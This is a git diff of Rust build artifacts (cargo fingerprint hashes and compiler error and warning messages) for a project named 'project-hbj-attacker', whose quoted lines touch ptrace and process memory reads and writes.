+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `sys_write_test` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":203,"byte_end":217,"line_start":14,"line_end":14,"column_start":4,"column_end":18,"is_primary":true,"text":[{"text":"fn sys_write_test()","highlight_start":4,"highlight_end":18}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `sys_write_test` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:14:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m14\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn sys_write_test()\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `write_memory_vm` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1757,"byte_end":1772,"line_start":68,"line_end":68,"column_start":8,"column_end":23,"is_primary":true,"text":[{"text":"pub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {","highlight_start":8,"highlight_end":23}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `write_memory_vm` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:68:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m68\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"4 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 4 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..94b85f5
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/test-bin-project-hbj-attacker
@@ -0,0 +1 @@
+2b6a654b9c206619
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..8e08a9f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/dep-test-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/dep-test-lib-project_hbj_attacker
new file mode 100644
index 0000000..024be49
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/dep-test-lib-project_hbj_attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/test-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/test-lib-project_hbj_attacker
new file mode 100644
index 0000000..ed5ff59
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/test-lib-project_hbj_attacker
@@ -0,0 +1 @@
+ef6f357586a799cc
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/test-lib-project_hbj_attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/test-lib-project_hbj_attacker.json
new file mode 100644
index 0000000..7f6ee79
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/test-lib-project_hbj_attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":1436332732506357817,"profile":3316208278650011218,"path":10763286916239946207,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-0531b6d159b9dc84/dep-test-lib-project_hbj_attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..6e4e74c
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/output-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/output-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..f550764
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/output-test-bin-project-hbj-attacker
@@ -0,0 +1,8 @@
+{"$message_type":"diagnostic","message":"unresolved import `nix::sys::uio`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":59,"byte_end":62,"line_start":4,"line_end":4,"column_start":15,"column_end":18,"is_primary":true,"text":[{"text":"use nix::sys::uio::{process_vm_readv, RemoteIoVec};","highlight_start":15,"highlight_end":18}],"label":"could not find `uio` in `sys`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2675,"byte_end":2690,"line_start":170,"line_end":170,"column_start":8,"column_end":23,"is_primary":false,"text":[{"text":" #![feature = \"uio\"]","highlight_start":8,"highlight_end":23}],"label":"the item is gated behind the `uio` feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2704,"byte_end":2707,"line_start":171,"line_end":171,"column_start":13,"column_end":16,"is_primary":true,"text":[{"text":" pub mod uio;","highlight_start":13,"highlight_end":16}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::sys::uio`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:4:15\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m4\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse nix::sys::uio::{process_vm_readv, RemoteIoVec};\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `uio` in `sys`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:171:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m170\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #![feature = \"uio\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m---------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `uio` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m171\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m pub mod uio;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"cannot find struct, variant or union type `iovec` in this scope","code":{"code":"E0422","explanation":"An identifier that is neither defined nor a struct was used.\n\nErroneous code example:\n\n```compile_fail,E0422\nfn main () {\n let x = Foo { x: 1, y: 2 };\n}\n```\n\nIn this case, `Foo` is undefined, so it inherently isn't anything, and\ndefinitely not a struct.\n\n```compile_fail\nfn main () {\n let foo = 1;\n let x = foo { x: 1, y: 2 };\n}\n```\n\nIn this case, `foo` is defined, but is not a struct, so Rust can't use it as\none.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":1365,"byte_end":1370,"line_start":50,"line_end":50,"column_start":22,"column_end":27,"is_primary":true,"text":[{"text":" let local_iov = [iovec {","highlight_start":22,"highlight_end":27}],"label":"not found in this scope","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0422]\u001b[0m\u001b[0m\u001b[1m: cannot find struct, variant or union type `iovec` in this scope\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:50:22\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m50\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let local_iov = [iovec {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mnot found in this scope\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":1419,"byte_end":1423,"line_start":51,"line_end":51,"column_start":47,"column_end":51,"is_primary":true,"text":[{"text":" iov_base: buffer.as_mut_ptr() as *mut libc::c_void,","highlight_start":47,"highlight_end":51}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:51:47\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m51\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m iov_base: buffer.as_mut_ptr() as *mut libc::c_void,\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: could not find `ptrace` in `ptrace`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":1343,"byte_end":1349,"line_start":49,"line_end":49,"column_start":5,"column_end":11,"is_primary":true,"text":[{"text":" ptrace::detach(pid, None)?;","highlight_start":5,"highlight_end":11}],"label":"could not find `ptrace` in `ptrace`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"consider importing this module","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":13,"byte_end":13,"line_start":3,"line_end":3,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use nix::sys::ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::sys::ptrace;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `ptrace`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":1329,"byte_end":1343,"line_start":47,"line_end":49,"column_start":5,"column_end":5,"is_primary":true,"text":[{"text":" ptrace::","highlight_start":5,"highlight_end":13},{"text":"","highlight_start":1,"highlight_end":1},{"text":" ptrace::detach(pid, None)?;","highlight_start":1,"highlight_end":5}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: could not find `ptrace` in `ptrace`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:49:5\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m49\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::detach(pid, None)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `ptrace` in `ptrace`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this module\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m3\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::sys::ptrace;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if \u001b[0m\u001b[0m\u001b[38;5;9myou impo\u001b[0m\u001b[0mrt `ptrace`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m47\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0mptrace::\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m48\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1145,"byte_end":1146,"line_start":41,"line_end":41,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1145,"byte_end":1146,"line_start":41,"line_end":41,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:41:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m41\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 4 previous errors; 1 warning emitted","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 4 previous errors; 1 warning emitted\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"Some errors have detailed explanations: E0422, E0432, E0433.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mSome errors have detailed explanations: E0422, E0432, E0433.\u001b[0m\n"}
+{"$message_type":"diagnostic","message":"For more information about an error, try `rustc --explain E0422`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about an error, try `rustc --explain E0422`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..17a4cbe
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
